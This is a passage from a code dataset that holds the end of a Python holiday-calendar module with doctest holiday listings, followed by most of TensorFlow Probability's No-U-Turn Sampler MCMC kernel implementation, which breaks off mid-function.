\"en\")\n 1 2017/01/01 New Year's Day\n 104 2017/04/14 Good Friday\n 106 2017/04/16 Easter Sunday\n 107 2017/04/17 Easter Monday\n 121 2017/05/01 May Day Bank Holiday\n 149 2017/05/29 Spring Bank Holiday\n 240 2017/08/28 Late Summer Bank Holiday\n 359 2017/12/25 Christmas Day\n 360 2017/12/26 Boxing Day\n\n >>> _show (2016, \"US\", lang = \"en\")\n 1 2016/01/01 New Year's Day\n 18 2016/01/18 Martin Luther King Day\n 46 2016/02/15 Washington's Birthday\n 151 2016/05/30 Memorial Day\n 186 2016/07/04 Independence Day\n 249 2016/09/05 Labor Day\n 284 2016/10/10 Columbus Day\n 316 2016/11/11 Veterans Day\n 329 2016/11/24 Thanksgiving\n 360 2016/12/25 Christmas Day\n\n >>> _show (2017, \"US\", lang = \"en\")\n 1 2017/01/01 New Year's Day\n 16 2017/01/16 Martin Luther King Day\n 20 2017/01/20 Inauguration Day\n 51 2017/02/20 Washington's Birthday\n 149 2017/05/29 Memorial Day\n 185 2017/07/04 Independence Day\n 247 2017/09/04 Labor Day\n 282 2017/10/09 Columbus Day\n 315 2017/11/11 Veterans Day\n 327 2017/11/23 Thanksgiving\n 359 2017/12/25 Christmas Day\n\n >>> _show (2016, \"ANY\")\n 1 2016/01/01 Neujahr\n\n \"\"\"\n import _CAL.Year\n with TFL.I18N.test_language (lang) :\n Y = CAL.Year (year)\n O = Y.head.ordinal - 1\n for ordinal, name in sorted (pyk.iteritems (holidays (year, country))) :\n print (\"%3d %s %s\" % (ordinal - O, Y.cal.day [ordinal], _T (name)))\n# end def _show\n\ndef _main (cmd) :\n _show (cmd.year, cmd.country, cmd.language)\n# end def _main\n\ntoday = CAL.Date ()\nyear = today.year\n_Command = TFL.CAO.Cmd \\\n ( handler = _main\n , args =\n ( \"year:I=%d?Year for which to show holidays\" % (year, )\n ,\n )\n , opts =\n ( \"-country:S=AT?Country for which to show holidays\"\n , \"-language:S=de?Language to use for holiday names\"\n )\n , max_args = 1\n )\n\nif __name__ != \"__main__\" :\n CAL._Export (\"*\")\nelse :\n _Command ()\n### __END__ CAL.Holiday\n","sub_path":"Functions/venv/lib/python3.6/site-packages/_CAL/Holiday.py","file_name":"Holiday.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"101578681","text":"# Copyright 2019 The TensorFlow Probability Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"No U-Turn Sampler.\n\nThe implementation closely follows [1; Algorithm 3], with Multinomial sampling\non the tree (instead of slice sampling) and a generalized No-U-Turn termination\ncriterion [2; Appendix A].\n\nAchieves batch execution across chains by precomputing the recursive tree\ndoubling data access patterns and then executes this \"unrolled\" data pattern via\na `tf.while_loop`.\n\n#### References\n\n[1]: Matthew D. Hoffman, Andrew Gelman. The No-U-Turn Sampler: Adaptively\n Setting Path Lengths in Hamiltonian Monte Carlo.\n In _Journal of Machine Learning Research_, 15(1):1593-1623, 2014.\n http://jmlr.org/papers/volume15/hoffman14a/hoffman14a.pdf\n\n[2]: Michael Betancourt. A Conceptual Introduction to Hamiltonian Monte Carlo.\n _arXiv preprint arXiv:1701.02434_, 2018. https://arxiv.org/abs/1701.02434\n\"\"\"\n\nimport collections\nimport numpy as np\n\nimport tensorflow.compat.v2 as tf\n\nfrom tensorflow_probability.python.internal import broadcast_util as bu\nfrom tensorflow_probability.python.internal import distribute_lib\nfrom tensorflow_probability.python.internal import prefer_static as ps\nfrom tensorflow_probability.python.internal import samplers\nfrom tensorflow_probability.python.internal import tensorshape_util\nfrom tensorflow_probability.python.math import generic\nfrom tensorflow_probability.python.mcmc import kernel\nfrom tensorflow_probability.python.mcmc.internal import leapfrog_integrator as leapfrog_impl\nfrom tensorflow_probability.python.mcmc.internal import util as mcmc_util\n\nJAX_MODE = False\n\n##############################################################\n### BEGIN STATIC CONFIGURATION ###############################\n##############################################################\nTREE_COUNT_DTYPE = tf.int32 # Default: tf.int32\n\n# Whether to use slice sampling (original NUTS implementation in [1]) or\n# multinomial sampling (implementation in [2]) from the tree trajectory.\nMULTINOMIAL_SAMPLE = True # Default: True\n\n# Whether to use U turn criteria in [1] or generalized U turn criteria in [2]\n# to check the tree trajectory.\nGENERALIZED_UTURN = True # Default: True\n##############################################################\n### END STATIC CONFIGURATION #################################\n##############################################################\n\n__all__ = [\n 'NoUTurnSampler',\n]\n\n\nclass NUTSKernelResults(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'NUTSKernelResults',\n [\n 'target_log_prob',\n 'grads_target_log_prob',\n 'step_size',\n 'log_accept_ratio',\n 'leapfrogs_taken', # How many leapfrogs each chain took this step.\n 'is_accepted',\n 'reach_max_depth',\n 'has_divergence',\n 'energy',\n 'seed',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass MomentumStateSwap(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('MomentumStateSwap',\n ['momentum_swap', 'state_swap'])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass OneStepMetaInfo(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('OneStepMetaInfo',\n ['log_slice_sample',\n 'init_energy',\n 'write_instruction',\n 'read_instruction',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingState(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple('TreeDoublingState',\n ['momentum',\n 'state',\n 'target',\n 'target_grad_parts',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingStateCandidate(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'TreeDoublingStateCandidate',\n [\n 'state',\n 'target',\n 'target_grad_parts',\n 'energy',\n 'weight',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass TreeDoublingMetaState(\n mcmc_util.PrettyNamedTupleMixin,\n collections.namedtuple(\n 'TreeDoublingMetaState',\n [\n 'candidate_state', # A namedtuple of TreeDoublingStateCandidate.\n 'is_accepted',\n 'momentum_sum', # Sum of momentum of the current tree for\n # generalized U turn criteria.\n 'energy_diff_sum', # Sum over all states explored within the\n # subtree of Metropolis acceptance probabilities\n # exp(min(0, H' - H0)), where H0 is the negative\n # energy of the initial state and H' is the\n # negative energy of a state explored in the\n # subtree.\n # TODO(b/150152798): Do sum in log-space.\n 'leapfrog_count', # How many leapfrogs each chain has taken.\n 'continue_tree',\n 'not_divergence',\n ])):\n \"\"\"Internal state and diagnostics for No-U-Turn Sampler.\"\"\"\n __slots__ = ()\n\n\nclass NoUTurnSampler(kernel.TransitionKernel):\n \"\"\"Runs one step of the No U-Turn Sampler.\n\n The No U-Turn Sampler (NUTS) is an adaptive variant of the Hamiltonian Monte\n Carlo (HMC) method for MCMC. NUTS adapts the distance traveled in response to\n the curvature of the target density. Conceptually, one proposal consists of\n reversibly evolving a trajectory through the sample space, continuing until\n that trajectory turns back on itself (hence the name, 'No U-Turn'). This class\n implements one random NUTS step from a given `current_state`.\n Mathematical details and derivations can be found in\n [Hoffman, Gelman (2011)][1] and [Betancourt (2018)][2].\n\n The `one_step` function can update multiple chains in parallel. It assumes\n that a prefix of leftmost dimensions of `current_state` index independent\n chain states (and are therefore updated independently). The output of\n `target_log_prob_fn(*current_state)` should sum log-probabilities across all\n event dimensions. Slices along the rightmost dimensions may have different\n target distributions; for example, `current_state[0][0, ...]` could have a\n different target distribution from `current_state[0][1, ...]`. These\n semantics are governed by `target_log_prob_fn(*current_state)`. (The number of\n independent chains is `tf.size(target_log_prob_fn(*current_state))`.)\n\n #### References\n\n [1]: Matthew D. Hoffman, Andrew Gelman. The No-U-Turn Sampler: Adaptively\n Setting Path Lengths in Hamiltonian Monte Carlo. 2011.\n https://arxiv.org/pdf/1111.4246.pdf.\n\n [2]: Michael Betancourt. A Conceptual Introduction to Hamiltonian Monte Carlo.\n _arXiv preprint arXiv:1701.02434_, 2018. https://arxiv.org/abs/1701.02434\n \"\"\"\n\n def __init__(self,\n target_log_prob_fn,\n step_size,\n max_tree_depth=10,\n max_energy_diff=1000.,\n unrolled_leapfrog_steps=1,\n parallel_iterations=10,\n experimental_shard_axis_names=None,\n name=None):\n \"\"\"Initializes this transition kernel.\n\n Args:\n target_log_prob_fn: Python callable which takes an argument like\n `current_state` (or `*current_state` if it's a list) and returns its\n (possibly unnormalized) log-density under the target distribution.\n step_size: `Tensor` or Python `list` of `Tensor`s representing the step\n size for the leapfrog integrator. Must broadcast with the shape of\n `current_state`. Larger step sizes lead to faster progress, but\n too-large step sizes make rejection exponentially more likely. When\n possible, it's often helpful to match per-variable step sizes to the\n standard deviations of the target distribution in each variable.\n max_tree_depth: Maximum depth of the tree implicitly built by NUTS. The\n maximum number of leapfrog steps is bounded by `2**max_tree_depth` i.e.\n the number of nodes in a binary tree `max_tree_depth` nodes deep. The\n default setting of 10 takes up to 1024 leapfrog steps.\n max_energy_diff: Scaler threshold of energy differences at each leapfrog,\n divergence samples are defined as leapfrog steps that exceed this\n threshold. Default to 1000.\n unrolled_leapfrog_steps: The number of leapfrogs to unroll per tree\n expansion step. Applies a direct linear multipler to the maximum\n trajectory length implied by max_tree_depth. Defaults to 1.\n parallel_iterations: The number of iterations allowed to run in parallel.\n It must be a positive integer. See `tf.while_loop` for more details.\n experimental_shard_axis_names: A structure of string names indicating how\n members of the state are sharded.\n name: Python `str` name prefixed to Ops created by this function.\n Default value: `None` (i.e., 'NoUTurnSampler').\n \"\"\"\n with tf.name_scope(name or 'NoUTurnSampler') as name:\n # Process `max_tree_depth` argument.\n max_tree_depth = tf.get_static_value(max_tree_depth)\n if max_tree_depth is None or max_tree_depth < 1:\n raise ValueError(\n 'max_tree_depth must be known statically and >= 1 but was '\n '{}'.format(max_tree_depth))\n self._max_tree_depth = max_tree_depth\n\n # Compute parameters derived from `max_tree_depth`.\n instruction_array = build_tree_uturn_instruction(\n max_tree_depth, init_memory=-1)\n [\n write_instruction_numpy,\n read_instruction_numpy\n ] = generate_efficient_write_read_instruction(instruction_array)\n\n # TensorArray version of the read/write instruction need to be created\n # within the function call to be compatible with XLA. Here we store the\n # numpy version of the instruction and convert it to TensorArray later.\n self._write_instruction = write_instruction_numpy\n self._read_instruction = read_instruction_numpy\n\n # Process all other arguments.\n self._target_log_prob_fn = target_log_prob_fn\n self._step_size = step_size\n\n self._parameters = dict(\n target_log_prob_fn=target_log_prob_fn,\n step_size=step_size,\n max_tree_depth=max_tree_depth,\n max_energy_diff=max_energy_diff,\n unrolled_leapfrog_steps=unrolled_leapfrog_steps,\n parallel_iterations=parallel_iterations,\n experimental_shard_axis_names=experimental_shard_axis_names,\n name=name,\n )\n self._parallel_iterations = parallel_iterations\n self._unrolled_leapfrog_steps = unrolled_leapfrog_steps\n self._name = name\n self._max_energy_diff = max_energy_diff\n\n @property\n def target_log_prob_fn(self):\n return self._target_log_prob_fn\n\n @property\n def step_size(self):\n return self._step_size\n\n @property\n def max_tree_depth(self):\n return self._max_tree_depth\n\n @property\n def max_energy_diff(self):\n return self._max_energy_diff\n\n @property\n def unrolled_leapfrog_steps(self):\n return self._unrolled_leapfrog_steps\n\n @property\n def name(self):\n return self._name\n\n @property\n def parallel_iterations(self):\n return self._parallel_iterations\n\n @property\n def write_instruction(self):\n return self._write_instruction\n\n @property\n def read_instruction(self):\n return self._read_instruction\n\n @property\n def parameters(self):\n return self._parameters\n\n @property\n def is_calibrated(self):\n return True\n\n def one_step(self, current_state, previous_kernel_results, seed=None):\n seed = samplers.sanitize_seed(seed) # Retain for diagnostics.\n start_trajectory_seed, loop_seed = samplers.split_seed(seed)\n\n with tf.name_scope(self.name + '.one_step'):\n state_structure = current_state\n current_state = tf.nest.flatten(current_state)\n if (tf.nest.is_nested(state_structure)\n and (not mcmc_util.is_list_like(state_structure)\n or len(current_state) != len(state_structure))):\n # TODO(b/170865194): Support dictionaries and other non-list-like state.\n raise TypeError('NUTS does not currently support nested or '\n 'non-list-like state structures (saw: {}).'.format(\n state_structure))\n\n current_target_log_prob = previous_kernel_results.target_log_prob\n [\n init_momentum,\n init_energy,\n log_slice_sample\n ] = self._start_trajectory_batched(current_state, current_target_log_prob,\n seed=start_trajectory_seed)\n\n def _copy(v):\n return v * ps.ones(\n ps.pad(\n [2], paddings=[[0, ps.rank(v)]], constant_values=1),\n dtype=v.dtype)\n\n initial_state = TreeDoublingState(\n momentum=init_momentum,\n state=current_state,\n target=current_target_log_prob,\n target_grad_parts=previous_kernel_results.grads_target_log_prob)\n initial_step_state = tf.nest.map_structure(_copy, initial_state)\n\n if MULTINOMIAL_SAMPLE:\n init_weight = tf.zeros_like(init_energy) # log(exp(H0 - H0))\n else:\n init_weight = tf.ones_like(init_energy, dtype=TREE_COUNT_DTYPE)\n\n candidate_state = TreeDoublingStateCandidate(\n state=current_state,\n target=current_target_log_prob,\n target_grad_parts=previous_kernel_results.grads_target_log_prob,\n energy=init_energy,\n weight=init_weight)\n\n initial_step_metastate = TreeDoublingMetaState(\n candidate_state=candidate_state,\n is_accepted=tf.zeros_like(init_energy, dtype=tf.bool),\n momentum_sum=init_momentum,\n energy_diff_sum=tf.zeros_like(init_energy),\n leapfrog_count=tf.zeros_like(init_energy, dtype=TREE_COUNT_DTYPE),\n continue_tree=tf.ones_like(init_energy, dtype=tf.bool),\n not_divergence=tf.ones_like(init_energy, dtype=tf.bool))\n\n # Convert the write/read instruction into TensorArray so that it is\n # compatible with XLA.\n write_instruction = tf.TensorArray(\n TREE_COUNT_DTYPE,\n size=len(self._write_instruction),\n clear_after_read=False).unstack(self._write_instruction)\n read_instruction = tf.TensorArray(\n tf.int32,\n size=len(self._read_instruction),\n clear_after_read=False).unstack(self._read_instruction)\n\n current_step_meta_info = OneStepMetaInfo(\n log_slice_sample=log_slice_sample,\n init_energy=init_energy,\n write_instruction=write_instruction,\n read_instruction=read_instruction\n )\n\n momentum_state_memory = MomentumStateSwap(\n momentum_swap=self.init_momentum_state_memory(init_momentum),\n state_swap=self.init_momentum_state_memory(current_state))\n\n step_size = _prepare_step_size(\n previous_kernel_results.step_size,\n current_target_log_prob.dtype,\n len(current_state))\n _, _, _, new_step_metastate = tf.while_loop(\n cond=lambda iter_, seed, state, metastate: ( # pylint: disable=g-long-lambda\n (iter_ < self.max_tree_depth) &\n tf.reduce_any(metastate.continue_tree)),\n body=lambda iter_, seed, state, metastate: self._loop_tree_doubling( # pylint: disable=g-long-lambda\n step_size,\n momentum_state_memory,\n current_step_meta_info,\n iter_,\n state,\n metastate,\n seed),\n loop_vars=(\n tf.zeros([], dtype=tf.int32, name='iter'),\n loop_seed,\n initial_step_state,\n initial_step_metastate),\n parallel_iterations=self.parallel_iterations,\n )\n\n kernel_results = NUTSKernelResults(\n target_log_prob=new_step_metastate.candidate_state.target,\n grads_target_log_prob=(\n new_step_metastate.candidate_state.target_grad_parts),\n step_size=previous_kernel_results.step_size,\n log_accept_ratio=tf.math.log(\n new_step_metastate.energy_diff_sum /\n tf.cast(new_step_metastate.leapfrog_count,\n dtype=new_step_metastate.energy_diff_sum.dtype)),\n leapfrogs_taken=(\n new_step_metastate.leapfrog_count * self.unrolled_leapfrog_steps\n ),\n is_accepted=new_step_metastate.is_accepted,\n reach_max_depth=new_step_metastate.continue_tree,\n has_divergence=~new_step_metastate.not_divergence,\n energy=new_step_metastate.candidate_state.energy,\n seed=seed,\n )\n\n result_state = tf.nest.pack_sequence_as(\n state_structure, new_step_metastate.candidate_state.state)\n return result_state, kernel_results\n\n def init_momentum_state_memory(self, input_tensors):\n \"\"\"Allocate TensorArray for storing state and momentum.\"\"\"\n shape_and_dtype = [(ps.shape(x_), x_.dtype) for x_ in input_tensors]\n return [ # pylint: disable=g-complex-comprehension\n ps.zeros(\n ps.concat([[max(self._write_instruction) + 1], s], axis=0),\n dtype=d) for (s, d) in shape_and_dtype\n ]\n\n def bootstrap_results(self, init_state):\n \"\"\"Creates initial `previous_kernel_results` using a supplied `state`.\"\"\"\n with tf.name_scope(self.name + '.bootstrap_results'):\n if not tf.nest.is_nested(init_state):\n init_state = [init_state]\n dummy_momentum = [tf.ones_like(state) for state in init_state]\n\n [\n _,\n _,\n current_target_log_prob,\n current_grads_log_prob,\n ] = leapfrog_impl.process_args(self.target_log_prob_fn, dummy_momentum,\n init_state)\n\n # Confirm that the step size is compatible with the state parts.\n _ = _prepare_step_size(\n self.step_size, current_target_log_prob.dtype, len(init_state))\n\n return NUTSKernelResults(\n target_log_prob=current_target_log_prob,\n grads_target_log_prob=current_grads_log_prob,\n step_size=tf.nest.map_structure(\n lambda x: tf.convert_to_tensor( # pylint: disable=g-long-lambda\n x,\n dtype=current_target_log_prob.dtype,\n name='step_size'),\n self.step_size),\n log_accept_ratio=tf.zeros_like(current_target_log_prob,\n name='log_accept_ratio'),\n leapfrogs_taken=tf.zeros_like(current_target_log_prob,\n dtype=TREE_COUNT_DTYPE,\n name='leapfrogs_taken'),\n is_accepted=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='is_accepted'),\n reach_max_depth=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='reach_max_depth'),\n has_divergence=tf.zeros_like(current_target_log_prob,\n dtype=tf.bool,\n name='has_divergence'),\n energy=compute_hamiltonian(\n current_target_log_prob, dummy_momentum,\n shard_axis_names=self.experimental_shard_axis_names),\n # Allow room for one_step's seed.\n seed=samplers.zeros_seed(),\n )\n\n @property\n def experimental_shard_axis_names(self):\n return self._parameters['experimental_shard_axis_names']\n\n def experimental_with_shard_axes(self, shard_axis_names):\n return self.copy(experimental_shard_axis_names=shard_axis_names)\n\n def _start_trajectory_batched(self, state, target_log_prob, seed):\n \"\"\"Computations needed to start a trajectory.\"\"\"\n with tf.name_scope('start_trajectory_batched'):\n seeds = list(samplers.split_seed(seed, n=len(state) + 1))\n momentum_seeds = distribute_lib.fold_in_axis_index(\n seeds[:-1], self.experimental_shard_axis_names)\n momentum = [\n samplers.normal( # pylint: disable=g-complex-comprehension\n shape=ps.shape(x),\n dtype=x.dtype,\n seed=momentum_seeds[i]) for (i, x) in enumerate(state)\n ]\n init_energy = compute_hamiltonian(\n target_log_prob, momentum,\n shard_axis_names=self.experimental_shard_axis_names)\n\n if MULTINOMIAL_SAMPLE:\n return momentum, init_energy, None\n\n # Draw a slice variable u ~ Uniform(0, p(initial state, initial\n # momentum)) and compute log u. For numerical stability, we perform this\n # in log space where log u = log (u' * p(...)) = log u' + log\n # p(...) and u' ~ Uniform(0, 1).\n log_slice_sample = tf.math.log1p(-samplers.uniform(\n shape=ps.shape(init_energy),\n dtype=init_energy.dtype,\n seed=seeds[len(state)]))\n return momentum, init_energy, log_slice_sample\n\n def _loop_tree_doubling(self, step_size, momentum_state_memory,\n current_step_meta_info, iter_, initial_step_state,\n initial_step_metastate, seed):\n \"\"\"Main loop for tree doubling.\"\"\"\n with tf.name_scope('loop_tree_doubling'):\n (direction_seed,\n subtree_seed,\n acceptance_seed,\n next_seed) = samplers.split_seed(seed, n=4)\n batch_shape = ps.shape(current_step_meta_info.init_energy)\n direction = tf.cast(\n samplers.uniform(\n shape=batch_shape,\n minval=0,\n maxval=2,\n dtype=tf.int32,\n seed=direction_seed),\n dtype=tf.bool)\n\n tree_start_states = tf.nest.map_structure(\n lambda v: bu.where_left_justified_mask(direction, v[1], v[0]),\n initial_step_state)\n\n directions_expanded = [\n bu.left_justified_expand_dims_like(direction, state)\n for state in tree_start_states.state\n ]\n\n integrator = leapfrog_impl.SimpleLeapfrogIntegrator(\n self.target_log_prob_fn,\n step_sizes=[\n tf.where(d, ss, -ss)\n for d, ss in zip(directions_expanded, step_size)\n ],\n num_steps=self.unrolled_leapfrog_steps)\n\n [\n candidate_tree_state,\n tree_final_states,\n final_not_divergence,\n continue_tree_final,\n energy_diff_tree_sum,\n momentum_subtree_cumsum,\n leapfrogs_taken\n ] = self._build_sub_tree(\n directions_expanded,\n integrator,\n current_step_meta_info,\n # num_steps_at_this_depth = 2**iter_ = 1 << iter_\n tf.bitwise.left_shift(1, iter_),\n tree_start_states,\n initial_step_metastate.continue_tree,\n initial_step_metastate.not_divergence,\n momentum_state_memory,\n seed=subtree_seed)\n\n last_candidate_state = initial_step_metastate.candidate_state\n\n energy_diff_sum = (\n energy_diff_tree_sum + initial_step_metastate.energy_diff_sum)\n if MULTINOMIAL_SAMPLE:\n tree_weight = tf.where(\n continue_tree_final,\n candidate_tree_state.weight,\n tf.constant(-np.inf, dtype=candidate_tree_state.weight.dtype))\n weight_sum = generic.log_add_exp(\n tree_weight, last_candidate_state.weight)\n log_accept_thresh = tree_weight - last_candidate_state.weight\n else:\n tree_weight = tf.where(\n continue_tree_final,\n candidate_tree_state.weight,\n tf.zeros([], dtype=TREE_COUNT_DTYPE))\n weight_sum = tree_weight + last_candidate_state.weight\n log_accept_thresh = tf.math.log(\n tf.cast(tree_weight, tf.float32) /\n tf.cast(last_candidate_state.weight, tf.float32))\n log_accept_thresh = tf.where(\n tf.math.is_nan(log_accept_thresh),\n tf.zeros([], log_accept_thresh.dtype),\n log_accept_thresh)\n u = tf.math.log1p(-samplers.uniform(\n shape=batch_shape,\n dtype=log_accept_thresh.dtype,\n seed=acceptance_seed))\n is_sample_accepted = u <= log_accept_thresh\n\n choose_new_state = is_sample_accepted & continue_tree_final\n\n new_candidate_state = TreeDoublingStateCandidate(\n state=[\n bu.where_left_justified_mask(choose_new_state, s0, s1)\n for s0, s1 in zip(candidate_tree_state.state,\n last_candidate_state.state)\n ],\n target=bu.where_left_justified_mask(\n choose_new_state,\n candidate_tree_state.target,\n last_candidate_state.target),\n target_grad_parts=[\n bu.where_left_justified_mask(choose_new_state, grad0, grad1)\n for grad0, grad1 in zip(candidate_tree_state.target_grad_parts,\n last_candidate_state.target_grad_parts)\n ],\n energy=bu.where_left_justified_mask(\n choose_new_state,\n candidate_tree_state.energy,\n last_candidate_state.energy),\n weight=weight_sum)\n\n for new_candidate_state_temp, old_candidate_state_temp in zip(\n new_candidate_state.state, last_candidate_state.state):\n tensorshape_util.set_shape(new_candidate_state_temp,\n old_candidate_state_temp.shape)\n\n for new_candidate_grad_temp, old_candidate_grad_temp in zip(\n new_candidate_state.target_grad_parts,\n last_candidate_state.target_grad_parts):\n tensorshape_util.set_shape(new_candidate_grad_temp,\n old_candidate_grad_temp.shape)\n\n # Update left right information of the trajectory, and check trajectory\n # level U turn\n tree_otherend_states = tf.nest.map_structure(\n lambda v: bu.where_left_justified_mask(direction, v[0], v[1]),\n initial_step_state)\n\n new_step_state = tf.nest.pack_sequence_as(initial_step_state, [\n tf.stack([ # pylint: disable=g-complex-comprehension\n bu.where_left_justified_mask(direction, right, left),\n bu.where_left_justified_mask(direction, left, right),\n ], axis=0)\n for left, right in zip(tf.nest.flatten(tree_final_states),\n tf.nest.flatten(tree_otherend_states))\n ])\n\n momentum_tree_cumsum = []\n for p0, p1 in zip(\n initial_step_metastate.momentum_sum, momentum_subtree_cumsum):\n momentum_part_temp = p0 + p1\n tensorshape_util.set_shape(momentum_part_temp, p0.shape)\n momentum_tree_cumsum.append(momentum_part_temp)\n\n for new_state_temp, old_state_temp in zip(\n tf.nest.flatten(new_step_state),\n tf.nest.flatten(initial_step_state)):\n tensorshape_util.set_shape(new_state_temp, old_state_temp.shape)\n\n if GENERALIZED_UTURN:\n state_diff = momentum_tree_cumsum\n else:\n state_diff = [s[1] - s[0] for s in new_step_state.state]\n\n no_u_turns_trajectory = has_not_u_turn(\n state_diff,\n [m[0] for m in new_step_state.momentum],\n [m[1] for m in new_step_state.momentum],\n log_prob_rank=ps.rank_from_shape(batch_shape),\n shard_axis_names=self.experimental_shard_axis_names)\n\n new_step_metastate = TreeDoublingMetaState(\n candidate_state=new_candidate_state,\n is_accepted=choose_new_state | initial_step_metastate.is_accepted,\n momentum_sum=momentum_tree_cumsum,\n energy_diff_sum=energy_diff_sum,\n continue_tree=continue_tree_final & no_u_turns_trajectory,\n not_divergence=final_not_divergence,\n leapfrog_count=(initial_step_metastate.leapfrog_count +\n leapfrogs_taken))\n\n return iter_ + 1, next_seed, new_step_state, new_step_metastate\n\n def _build_sub_tree(self,\n directions,\n integrator,\n current_step_meta_info,\n nsteps,\n initial_state,\n continue_tree,\n not_divergence,\n momentum_state_memory,\n seed,\n name=None):\n with tf.name_scope('build_sub_tree'):\n batch_shape = ps.shape(current_step_meta_info.init_energy)\n # We never want to select the initial state\n if MULTINOMIAL_SAMPLE:\n init_weight = tf.fill(\n batch_shape,\n tf.constant(-np.inf,\n dtype=current_step_meta_info.init_energy.dtype))\n else:\n init_weight = tf.zeros(batch_shape, dtype=TREE_COUNT_DTYPE)\n\n init_momentum_cumsum = [tf.zeros_like(x) for x in initial_state.momentum]\n initial_state_candidate = TreeDoublingStateCandidate(\n state=initial_state.state,\n target=initial_state.target,\n target_grad_parts=initial_state.target_grad_parts,\n energy=initial_state.target,\n weight=init_weight)\n energy_diff_sum = tf.zeros_like(current_step_meta_info.init_energy,\n name='energy_diff_sum')\n [\n _,\n _,\n energy_diff_tree_sum,\n momentum_tree_cumsum,\n leapfrogs_taken,\n final_state,\n candidate_tree_state,\n final_continue_tree,\n final_not_divergence,\n momentum_state_memory,\n ] = tf.while_loop(\n cond=lambda iter_, seed, energy_diff_sum, init_momentum_cumsum, # pylint: disable=g-long-lambda\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory: (\n (iter_ < nsteps) & tf.reduce_any(continue_tree)),\n body=lambda iter_, seed, energy_diff_sum, init_momentum_cumsum, # pylint: disable=g-long-lambda\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory: (\n self._loop_build_sub_tree(\n directions, integrator, current_step_meta_info,\n iter_, energy_diff_sum, init_momentum_cumsum,\n leapfrogs_taken, state, state_c, continue_tree,\n not_divergence, momentum_state_memory, seed)),\n loop_vars=(\n tf.zeros([], dtype=tf.int32, name='iter'),\n seed,\n energy_diff_sum,\n init_momentum_cumsum,\n tf.zeros(batch_shape, dtype=TREE_COUNT_DTYPE),\n initial_state,\n initial_state_candidate,\n continue_tree,\n not_divergence,\n momentum_state_memory,\n ),\n parallel_iterations=self.parallel_iterations\n )\n\n return (\n candidate_tree_state,\n final_state,\n final_not_divergence,\n final_continue_tree,\n energy_diff_tree_sum,\n momentum_tree_cumsum,\n leapfrogs_taken,\n )\n\n def _loop_build_sub_tree(self,\n directions,\n integrator,\n current_step_meta_info,\n iter_,\n energy_diff_sum_previous,\n momentum_cumsum_previous,\n leapfrogs_taken,\n prev_tree_state,\n candidate_tree_state,\n continue_tree_previous,\n not_divergent_previous,\n momentum_state_memory,\n seed):\n \"\"\"Base case in tree doubling.\"\"\"\n acceptance_seed, next_seed = samplers.split_seed(seed)\n with tf.name_scope('loop_build_sub_tree'):\n # Take one leapfrog step in the direction v and check divergence\n [\n next_momentum_parts,\n next_state_parts,\n next_target,\n next_target_grad_parts\n ] = integrator(prev_tree_state.momentum,\n prev_tree_state.state,\n prev_tree_state.target,\n prev_tree_state.target_grad_parts)\n\n next_tree_state = TreeDoublingState(\n momentum=next_momentum_parts,\n state=next_state_parts,\n target=next_target,\n target_grad_parts=next_target_grad_parts)\n momentum_cumsum = [p0 + p1 for p0, p1 in zip(momentum_cumsum_previous,\n next_momentum_parts)]\n # If the tree have not yet terminated previously, we count this leapfrog.\n leapfrogs_taken = tf.where(\n continue_tree_previous, leapfrogs_taken + 1, leapfrogs_taken)\n\n write_instruction = current_step_meta_info.write_instruction\n read_instruction = current_step_meta_info.read_instruction\n init_energy = current_step_meta_info.init_energy\n\n if GENERALIZED_UTURN:\n state_to_write = momentum_cumsum_previous\n state_to_check = momentum_cumsum\n else:\n state_to_write = next_state_parts\n state_to_check = next_state_parts\n\n batch_shape = ps.shape(next_target)\n has_not_u_turn_init = ps.ones(batch_shape, dtype=tf.bool)\n\n read_index = read_instruction.gather([iter_])[0]\n no_u_turns_within_tree = has_not_u_turn_at_all_index( # pylint: disable=g-long-lambda\n read_index,\n directions,\n momentum_state_memory,\n next_momentum_parts,\n state_to_check,\n has_not_u_turn_init,\n log_prob_rank=ps.rank(next_target),\n shard_axis_names=self.experimental_shard_axis_names)\n\n # Get index to write state into memory swap\n write_index = write_instruction.gather([iter_])\n momentum_state_memory = MomentumStateSwap(\n momentum_swap=[\n _safe_tensor_scatter_nd_update(old, [write_index], [new])\n for old, new in zip(momentum_state_memory.momentum_swap,\n next_momentum_parts)\n ],\n state_swap=[\n _safe_tensor_scatter_nd_update(old, [write_index], [new])\n for old, new in zip(momentum_state_memory.state_swap,\n state_to_write)\n ])\n\n energy = compute_hamiltonian(\n next_target, next_momentum_parts,\n shard_axis_names=self.experimental_shard_axis_names)\n current_energy = tf.where(tf.math.is_nan(energy),\n tf.constant(-np.inf, dtype=energy.dtype),\n energy)\n energy_diff = current_energy - init_energy\n\n if MULTINOMIAL_SAMPLE:\n not_divergent = -energy_diff < self.max_energy_diff\n weight_sum = generic.log_add_exp(\n candidate_tree_state.weight, energy_diff)\n 